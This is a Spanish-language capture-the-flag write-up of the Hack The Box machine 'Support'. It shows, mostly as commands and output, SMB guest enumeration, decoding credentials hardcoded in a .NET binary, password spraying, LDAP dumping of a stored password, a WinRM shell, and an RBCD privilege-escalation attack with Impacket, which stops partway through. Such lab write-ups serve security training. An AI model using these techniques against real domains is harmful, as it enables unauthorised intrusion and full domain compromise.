Support
Dificultad: Easy - OS: Windows
Enumeración de puertos/servicios
┌──(root㉿kali)-[/home/kali/Documents/HTB]
└─# nmap -sCV --open -T4 -v -n 10.10.11.174Resultado:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-12 03:51:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-12T03:52:11
|_ start_date: N/A
|_clock-skew: -8m58sEn síntesis:
| Port | State | Service | Protocol / Version Info |
|----------|-------|------------------------|-----------------------------------------------------------------------------------------------
| 53/tcp | open | domain | Simple DNS Plus
| 88/tcp | open | kerberos-sec | Microsoft Windows Kerberos (server time: 2025-05-12 03:51:57Z)
| 135/tcp | open | msrpc | Microsoft Windows RPC
| 139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn
| 389/tcp | open | ldap | Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
| 445/tcp | open | microsoft-ds (SMB/CIFS)| Unknown version (service detected but not fingerprinted)
| 464/tcp | open | kpasswd5 | Unknown version
| 593/tcp | open | ncacn_http | Microsoft Windows RPC over HTTP 1.0
| 636/tcp | open | tcpwrapped |
| 3268/tcp | open | ldap | Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
| 3269/tcp | open | tcpwrapped |
| 5985/tcp | open | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) Añadimos el controlador de dominio (DC) que nos muestra nmap a nuestro archivo /etc/hosts
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# echo "10.10.11.174 support.htb" >> /etc/hosts Nota: de esta forma logramos que el sistema pueda resolver correctamente ese nombre cuando se utilicen herramientas que lo requieran. En entornos de Active Directory, muchos servicios como Kerberos, SMB o WinRM necesitan que el nombre de dominio esté correctamente mapeado a una IP para funcionar. Si este mapeo no existe, comandos y herramientas que dependen del nombre del dominio podrían fallar.
SMB Enumeration con Enum4linux-ng
Ahora vamos a extraer más información del objetivo con enum4linux-ng conectándonos como guest
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# enum4linux-ng -A support.htb -u SUPPORT/guest -p ""
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... support.htb
[*] Username ......... 'SUPPORT/guest'
[*] Random Username .. 'bztefksc'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
==========================================================
| Domain Information via SMB session for support.htb |
==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC
NetBIOS domain name: SUPPORT
DNS domain: support.htb
FQDN: dc.support.htb
Derived membership: domain member
Derived domain: SUPPORT
=====================================
| Shares via RPC on support.htb |
=====================================
[*] Enumerating shares
[+] Found 6 share(s):
ADMIN$:
comment: Remote Admin
type: Disk
C$:
comment: Default share
type: Disk
IPC$:
comment: Remote IPC
type: IPC
NETLOGON:
comment: Logon server share
type: Disk
SYSVOL:
comment: Logon server share
type: Disk
support-tools:
comment: support staff tools
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[-] Could not parse result of smbclient command, please open a GitHub issue
[*] Testing share SYSVOL
[-] Could not parse result of smbclient command, please open a GitHub issue
[*] Testing share support-tools
[+] Mapping: OK, Listing: OK
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# echo "10.10.11.174 dc.support.htb" >> /etc/hosts Encontramos el FQDN que también es importante agregarlo al fichero /etc/hosts. El DNS domain es el contenedor lógico (support.htb), y el FQDN es la identificación completa de un equipo específico dentro de ese contenedor (dc.support.htb).
¿Por qué es válido usar el usuario guest en herramientas como enum4linux?
guest en herramientas como enum4linux?En muchos sistemas Windows mal configurados (o con configuraciones predeterminadas antiguas), existe una cuenta de invitado llamada Guest o guest que permite autenticación con privilegios mínimos o incluso sin contraseña. Aunque tiene accesos limitados, puede usarse para:
Enumerar shares públicos (
smbclient -L).Obtener información básica del dominio o de usuarios a través de
rpcclientoenum4linux.Validar si el sistema permite autenticación anónima
De los recursos que se enumeraron del SMB hay uno que se llama support-tools allí vamos a ingresar para inspeccionar su contenido usando smbclient.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# smbclient \\\\support.htb\\support-tools -U SUPPORT/guest
Password for [SUPPORT\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
4026367 blocks of size 4096. 970318 blocks available
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (145.3 KiloBytes/sec) (average 145.3 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# strings UserInfo.exeExtracción de credenciales hardcodeadas mediante Reverse Engineering
El recurso que nos interesa descargar para analizar de forma local es el UserInfo.exe.zip. Si analizamos las secuencias de caracteres con strings vamos a ver que se trata de un programa codeado en .NET. Entonces lo siguiente que debemos hacer es decompilarlo con alguna tool como ILSpy para analizar su código fuente en busca de credenciales hardcodeadas. Para instalar y ejecutar este programa en kali seguimos estos pasos:
$ wget https://github.com/icsharpcode/AvaloniaILSpy/releases/download/v7.2-rc/Linux.x64.Release.zip
$ unzip Linux.x64.Release.zip
$ unzip ILSpy-linux-x64-Release.zip
$ cd artifacts/linux-x64
$ chmod +x ILSpy
$ ./ILSpyLuego descomprimimos el UserInfo.exe.zip y abrimos el ejecutable con ILSpy
Las funciones críticas que nos interesan son LdapQuery y Protected, allí encontraremos la forma en que el binario codifica las contraseñas y también un posible usuario del sistema.
Este patrón es típico de aplicaciones internas que intentan ocultar credenciales pero que, al quedar embebidas en un ejecutable, pueden ser recuperadas fácilmente mediante reversing.
Entonces la contraseña que vamos a descifrar es
0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E
Y vamos a hacerlo con CyberChef. Pero primero repasemos cómo es cifrada la contraseña:
La función
getPassword()en el binario replica exactamente esta lógica:Decodifica la contraseña de Base64.
Aplica un XOR con la clave
"armando"(cíclico).Aplica un XOR con
0xDF.Devuelve la contraseña como string.
La función
LdapQuery()usa esta contraseña para conectarse a un servidor LDAP con el usuariosupport\ldap.
¿Cómo se descifra en CyberChef?
Para revertir este proceso y obtener la contraseña original, replicamos las operaciones en orden inverso:
1. From Base64
Decodificamos el string para obtener los bytes ofuscados.
2. XOR con "armando"
Aplicamos XOR con la clave armando. Esto revierte la primera capa del cifrado.
3. XOR con DF (hex)
Aplicamos un XOR final con el valor 0xDF a cada byte. Esto revierte la segunda capa aplicada durante el cifrado.
User enumeration con imapcket-lookupsid
Y así logramos descifrar la contraseña: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz que corresponde al usuario ldap. Ahora, algo que puede suceder en otro escenario como este es que no contemos con un usuario para usar junto con la contraseña, entonces lo que podemos hacer es enumerar usuarios con el script impacket-lookupsid para luego armar una lista de usuarios, validarlos con kerbrute y buscar aquel que haga el match con la contraseña mediante la técnica password spraying. Para obtener la lista de usuarios parceada diseñe el siguiente script en bash que tira de impacket-lookupsid y edita el output del script para volcar los nombres en limpio dentro de una lista llamada users_enum.txt. Para obtenerlo podes ir al siguiente repositorio lookupsid_enum.sh
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-lookupsid -no-pass 'SUPPORT/guest@support.htb'
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# lookupsid_enum.sh 10.10.11.174 guest '' support.htb
[*] Ejecutando impacket-lookupsid contra 10.10.11.174 con support.htb/guest...
Password:
[*] Extrayendo usuarios válidos (SidTypeUser)...
[+] Usuarios extraídos:
Administrator
anderson.damian
bardot.mary
cromwell.gerard
daughtler.mabel
DC$
ford.victoria
Guest
hernandez.stanley
krbtgt
langley.lucy
ldap
levine.leopoldo
monroe.david
raven.clifton
smith.rosario
stoll.rachelle
support
thomas.raphael
west.laura
wilson.shelby
[+] Archivo generado: users_enum.txtUsaremos la lista de usuarios que generamos para validarlos con Kerbrute. Aunque este paso no es estrictamente necesario, nos permite confirmar cuáles de esos usuarios existen realmente en el Active Directory
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# kerbrute userenum -d support.htb --dc dc.support.htb users_enum.txt -v
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 05/15/25 - Ronnie Flathers @ropnop
2025/05/15 20:10:11 > Using KDC(s):
2025/05/15 20:10:11 > dc.support.htb:88
2025/05/15 20:10:12 > [+] VALID USERNAME: Administrator@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: DC$@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: hernandez.stanley@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: ldap@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: smith.rosario@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: support@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: wilson.shelby@support.htb
2025/05/15 20:10:12 > [!] krbtgt@support.htb - USER LOCKED OUT
2025/05/15 20:10:12 > [+] VALID USERNAME: anderson.damian@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: Guest@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: raven.clifton@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: levine.leopoldo@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: thomas.raphael@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: cromwell.gerard@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: bardot.mary@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: stoll.rachelle@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: west.laura@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: daughtler.mabel@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: monroe.david@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: langley.lucy@support.htb
2025/05/15 20:10:12 > [+] VALID USERNAME: ford.victoria@support.htb
2025/05/15 20:10:12 > Done! Tested 21 usernames (20 valid) in 0.714 secondsPassword spraying con Kerbrute
Una vez que nos aseguramos que todos los usuarios de la lista son válidos podemos buscar el match con la contraseña usando el módulo passwordspray de kerbrute
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# kerbrute passwordspray -d support.htb --dc dc.support.htb users_enum.txt 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -v
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 05/15/25 - Ronnie Flathers @ropnop
2025/05/15 20:13:30 > Using KDC(s):
2025/05/15 20:13:30 > dc.support.htb:88
2025/05/15 20:13:31 > [!] Guest@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2025/05/15 20:13:31 > [!] krbtgt@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - USER LOCKED OUT
2025/05/15 20:13:31 > [+] VALID LOGIN WITH ERROR: ldap@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz (Clock skew is too great)
2025/05/15 20:13:31 > [!] smith.rosario@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] Administrator@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] wilson.shelby@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] support@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] anderson.damian@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] DC$@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] hernandez.stanley@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] thomas.raphael@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] levine.leopoldo@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] raven.clifton@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] bardot.mary@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] monroe.david@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] cromwell.gerard@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] langley.lucy@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] daughtler.mabel@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] west.laura@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:31 > [!] stoll.rachelle@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:32 > [!] ford.victoria@support.htb:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz - Invalid password
2025/05/15 20:13:32 > Done! Tested 21 logins (1 successes) in 1.219 secondsUna vez que logramos obtener un nuevo par de credenciales lo más recomendable es testear a que servicios nos podemos conectar/logear, de esta forma tendremos una idea de por donde continuar el ataque/intrusión. Para automatizar esta tarea diseñe un script en bash que lo podes obtener del siguiente repositorio: service_validation.sh
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# service_validation.sh support.htb ldap 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
[*] Probando credenciales contra support.htb con usuario 'ldap'...
--- Probando smb ---
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
--- Probando ldap ---
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.174 389 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
--- Probando winrm ---
WINRM 10.10.11.174 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM 10.10.11.174 5985 DC [-] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
--- Probando rdp ---
--- Probando mssql ---
--- Probando wmi ---
RPC 10.10.11.174 135 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
RPC 10.10.11.174 135 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
--- Probando ftp ---
--- Probando ssh ---
LDAP Enumeration con Ldapsearch
Aprovechando que tenemos autorización para autenticarnos al LDAP vamos a realizar una búsqueda LDAP autenticada con ldapsearch dentro del dominio support.htb y extraeremos objetos del dominio en busca de
Usuarios y atributos (nombres, grupos, descripciones, contraseñas en campos como
info, etc.).Grupos y membresías.
Equipos del dominio.
Configuraciones de políticas o relaciones de confianza.
En este caso si filtramos la información por el sammacountname: y vemos las 36 líneas anteriores que corresponden al usuario en cuestión podremos leer toda la información de cada uno. Al revisar toda la información de los usuarios vamos a encontrar unas credenciales hardcodeadas pertenecientes al usuario support
grep -i "samaccountname: support"→ busca (ignorando mayúsculas/minúsculas) la línea que contiene el nombre de cuentasupport-B 36→ muestra las 36 líneas anteriores a la línea que contiene el resultado buscado, para así capturar todo el bloque de atributos de esa entrada de usuario
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# ldapsearch -x -H ldap://10.10.11.174 -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" > ldap_enum.txt
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# cat ldap_enum.txt | grep -i "samaccountname: support" -B 36
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 1
codePage: 0
countryCode: 0
badPasswordTime: 133950161361730761
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: supportAhora que conseguimos otro par de credenciales nuevas podemos chequear cuales son los servicios a los que podemos acceder con el script service_validation.sh
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# service_validation.sh support.htb support 'Ironside47pleasure40Watchful'
[*] Probando credenciales contra support.htb con usuario 'support'...
--- Probando smb ---
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\support:Ironside47pleasure40Watchful
--- Probando ldap ---
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.174 389 DC [+] support.htb\support:Ironside47pleasure40Watchful
--- Probando winrm ---
WINRM 10.10.11.174 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM 10.10.11.174 5985 DC [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)
--- Probando rdp ---
--- Probando mssql ---
--- Probando wmi ---
RPC 10.10.11.174 135 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
RPC 10.10.11.174 135 DC [+] support.htb\support:Ironside47pleasure40Watchful
--- Probando ftp ---
--- Probando ssh ---Active Directory Privilege Escalation Mapping con Bloodhound
Tenemos acceso a WinRM, por lo que podemos ingresar usando EvilWinRM y enumerar manualmente las características del usuario support en busca de privilegios o grupos para explotar
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=============== =============================================
support\support S-1-5-21-1677581083-3380853377-188903654-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SUPPORT\Shared Support Accounts Group S-1-5-21-1677581083-3380853377-188903654-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.Por ahora lo que destaca de esta enumeración es el grupo SUPPORT\Shared Support Accounts y el privilegio SeMachineAccountPrivilege pero vamos a realizar una enumeración más exhaustiva con bloodhound para ver si existe alguna relación entre estos objetos y el domain controller que podamos explotar para lograr escalar privilegios. Para enumerar info con Bloodhound tenemos dos opciones:
1) Con bloodhound-python
Si no conoces esta herramienta a continuación te dejo un artículo introductorio para que puedas comprender su uso
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -d support.htb -v --zip -c All -dc support.htb -ns 10.10.11.1742) Con el módulo --bloodhound de nxc
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# nxc ldap 10.10.11.174 -u support -p support_pass --bloodhound -ns 10.10.11.174 -c Group,LocalAdmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOnUna vez que tenemos el archivo con toda la información recolectada abrimos la gui de Bloodhound y volcamos el .zip para ver el mapa de relaciones entre objetos del dominio.
Si buscamos específicamente qué relaciones tiene el grupo SUPPORT\Shared Support Accounts con el dominio vamos a encontrar lo siguiente:
Este resultado nos indica lo siguiente:
BloodHound muestra que ese grupo tiene permisos excesivos (
GenericAll) sobre el Domain Controller (DC.SUPPORT.HTB), lo que significa que tiene control total sobre ese equipo dentro del dominio.Esto nos indica que podemos realizar una escalada de privilegios mediante la técnica llamada Resource-Based Constrained Delegation (RBCD).
Con RBCD, podriamos crear una máquina falsa, configurar delegación hacia el DC, y obtener un ticket Kerberos como
Administrator, consiguiendo una shell comoNT AUTHORITY\SYSTEMRecordemos que el usuario
supportes miembro del grupoShared Support Accountspor lo tanto también contamos indirectamente con el permisoGenericAll, entonces podemos usar esta cuenta para explotar el RBCD
Resource-Based Constrained Delegation (RBCD) con Impacket
Si no conoces el funcionamiento de las delegaciones en Kerberos te recomiendo que antes leas el siguiente artículo donde explico los 3 tipos de delegación, Unconstrained Delegation, Constrained Delegation y Resource-Based Constrained Delegation, el último es el que explotáremos a continuación
Paso 1) Crear y agregar una cuenta con impacket-addcomputer
¿Qué hace el script impacket-addcomputer?
Este script agrega una nueva cuenta de máquina (Computer Account) al dominio. Por defecto, en muchos entornos de Active Directory los usuarios del dominio tienen el privilegio de crear objetos de computadora (hasta 10, por defecto).
Objetivo del ataque: Agregar un equipo controlado por el atacante al dominio, lo cual habilita los siguientes escenarios:
Obtener un TGT para esa máquina (como si fuera legítima).
Realizar ataques de delegación como RBCD (Resource-Based Constrained Delegation).
Generar tickets Kerberos para suplantar usuarios privilegiados (como
Administrator)
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-addcomputer -computer-name 'ATTACKCOMPUTER$' -computer-pass 'AttackPassword123' -dc-ip 10.10.11.174 'support.htb/support:Ironside47pleasure40Watchful'
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account ATTACKCOMPUTER$ with password AttackPassword123.Paso 2) Desde la sesión de EvilWinRM verificamos si la cuenta de equipo que acabamos de crear fue agregada correctamente al dominio Active Directory. Esto es importante antes de lanzar ataques de delegación. El comando que vamos a usar desde PowerShell es el siguiente
Get-ADComputer→ Cmdlet de PowerShell del módulo ActiveDirectory que permite consultar información de objetos de tipo "computadora" en el dominio. Requiere privilegios de red o ejecución local con acceso al dominio.-Identity "ATTACKCOMPUTER$"→ Especifica el nombre de la computadora que queremos buscar. El símbolo$indica que es una cuenta de equipo, como se utiliza en AD para distinguirlas de cuentas de usuario.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity "ATTACKCOMPUTER$"
DistinguishedName : CN=ATTACKCOMPUTER,CN=Computers,DC=support,DC=htb
DNSHostName :
Enabled : True
Name : ATTACKCOMPUTER
ObjectClass : computer
ObjectGUID : da8ba8f9-24d0-4515-a856-fdca1e8234d7
SamAccountName : ATTACKCOMPUTER$
SID : S-1-5-21-1677581083-3380853377-188903654-5603
UserPrincipalName :Paso 3) Con impacket-rbcd vamos a configurar la delegación basada en recursos (RBCD) para esta nueva cuenta, permitiéndole actuar en nombre de otros usuarios sobre un objetivo (como el DC$). A las cuentas que tienen esta configuración se las denomina "delegantes autorizados".
¿Qué hace este comando?
Este comando permite configurar delegación basada en recursos (RBCD) en un entorno Active Directory. En concreto, modifica el atributo msDS-AllowedToActOnBehalfOfOtherIdentity del equipo víctima (-delegate-to) para permitir que otro objeto (en este caso, un equipo que controlamos) pueda impersonar usuarios mediante el mecanismo S4U2Proxy.
Esto es esencial para explotar RBCD: primero se agrega una cuenta de equipo al dominio (con impacket-addcomputer), luego se le dan permisos sobre otro host con este comando.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-rbcd -action write -delegate-from 'ATTACKCOMPUTER$' -delegate-to 'DC$' -dc-ip 10.10.11.174 'support.htb/support:Ironside47pleasure40Watchful'
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5601
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5602
[*] Delegation rights modified successfully!
[*] ATTACKCOMPUTER$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5601
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5602
[*] ATTACKCOMPUTER$ (S-1-5-21-1677581083-3380853377-188903654-5603)
